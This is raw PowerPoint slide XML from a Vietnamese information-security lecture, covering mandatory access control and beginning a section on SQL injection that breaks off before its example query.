                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ô hình kiểm soát truy cập</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB1CE218-775F-DAB4-EB46-7E4BF0C3B118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3237517"/>
            <a:ext cx="9863328" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3. Mô hình kiểm soát truy cập bắt buộc (MAC)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:effectLst/>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6A59A33F-EEF6-95EA-06ED-11F8191D6F66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273176" y="3888719"/>
            <a:ext cx="9736403" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nhằm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>hạn chế khả năng mà chủ sở hữu tài nguyên riêng lẻ phải cấp hoặc từ chối quyền truy cập vào các đối tượng tài nguyên trong hệ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>thống tệp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9BE7266-53F9-A626-1D4B-17B0A83422AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1282212" y="5491161"/>
            <a:ext cx="9650717" cy="2400657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ví dụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>dữ liệu “tuyệt mật” được cung cấp cho một nhóm người dựa trên mức độ để truy cập các tài liệu “tuyệt mật” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>có quyền truy cập vào thông tin ở cấp độ thấp hơn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>. N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>hưng những nhân viên </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>có </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>quyền thấp hơn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> sẽ không có quyền truy cập vào thông tin được phân loại ở </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cấp độ cao hơn.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ADC9688-FF9B-5333-9B44-189C6DD89166}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11209300" y="3560028"/>
            <a:ext cx="6158694" cy="5276928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1657369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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="22" presetClass="entr" presetSubtype="4"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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>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down)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="with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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="2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2" grpId="0"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="5" grpId="0"/>
      <p:bldP spid="7" grpId="0"/>
      <p:bldP spid="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CA4EA4-AC53-E082-DCEE-C74E19038FA6}"/>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848FDB6A-ED30-EA7D-0C8D-8B7EBE4FA2FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5699680" y="-1470403"/>
            <a:ext cx="14026196" cy="11628992"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14026196" h="11628992">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14026196" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14026196" y="11628992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="116289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2" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69C1CDEF-43B6-80B8-7B1A-3EC881EC15A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760920" y="876300"/>
            <a:ext cx="15544799" cy="1647887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" u="none" spc="-84">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>II. Tìm hiểu về thực trạng và các công việc liên quan đến bảo mật hiện nay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1DB91F7-E91C-AE59-3419-F7138CC8D675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533400" y="2698265"/>
            <a:ext cx="17602199" cy="6712434"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED1BE891-C9F1-2DF3-5A82-7FA564C00200}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="40798" y="71151"/>
              <a:ext cx="3271246" cy="2164112"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3271246" h="2164112">
                  <a:moveTo>
                    <a:pt x="57855" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3213391" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3228735" y="0"/>
                    <a:pt x="3243451" y="6095"/>
                    <a:pt x="3254301" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3265150" y="27795"/>
                    <a:pt x="3271246" y="42511"/>
                    <a:pt x="3271246" y="57855"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3271246" y="2106257"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3271246" y="2121601"/>
                    <a:pt x="3265150" y="2136317"/>
                    <a:pt x="3254301" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3243451" y="2158016"/>
                    <a:pt x="3228735" y="2164112"/>
                    <a:pt x="3213391" y="2164112"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57855" y="2164112"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42511" y="2164112"/>
                    <a:pt x="27795" y="2158016"/>
                    <a:pt x="16945" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6095" y="2136317"/>
                    <a:pt x="0" y="2121601"/>
                    <a:pt x="0" y="2106257"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="57855"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="42511"/>
                    <a:pt x="6095" y="27795"/>
                    <a:pt x="16945" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27795" y="6095"/>
                    <a:pt x="42511" y="0"/>
                    <a:pt x="57855" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C19DC9DC-51FD-89E0-0F08-32C8443B6A2A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="172424"/>
              <a:ext cx="1554027" cy="405219"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{001FB2E2-B909-6B21-5EED-C00C0969E8A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128929" y="2916699"/>
            <a:ext cx="9158071" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Các cuộc tấn công có thể từ nhiều nguyên nhân (lỗ hổng ) khác nhau</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
              <a:ea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63E0BBCF-A306-7FDE-F88B-4840AFC94A2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113689" y="4024757"/>
            <a:ext cx="9863328" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3.1 Tấn công SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:effectLst/>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4488A448-F015-0709-F115-469AE326846F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128929" y="4770027"/>
            <a:ext cx="8679741" cy="2631490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Đầu vào được gán cho </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>các </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>biến input1 và input2 và nội dung của biến đó sẽ được sử dụng để tự động tạo truy vấn câu lệnh SQL như</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> sau:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="è"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ví dụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
